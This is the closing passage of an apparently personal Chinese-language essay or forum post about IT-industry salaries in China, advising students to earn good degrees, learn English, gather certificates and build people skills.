　　　　总结一下，it界不是没有高薪，而且it的高薪在所有理工类行业中是高的。关键是看你自己的能力。对于还没毕业的同学，我希望你们能先认真读书，至少拿个学士出来（最好是名校的），然后看看能不能考上好的大学的硕士，同时学好英语，多参加社会活动，即使你作it，技术也不过只有20%的比重而已，重要的是沟通和为人处世的技巧。对于刚出来的大学生，我的意见是先苦几年，多考一些外语和it的证书，准备向外企跳。 
　　　　 
　　　　最后一句，我所说的也许确实不好听，但事实如此，你可以举很多反例来反驳我（中专生拿高薪之类的），但这些例子是不能反映总体情况的，不信我们可以抽样调查。还有，中国有很多现状是不合理的，但你不能改变它，那要么你适应它，要么你毁灭。在沙漠里谁能活下来？是万物之长的人还是骆驼？还是慢慢成长的五点二十九？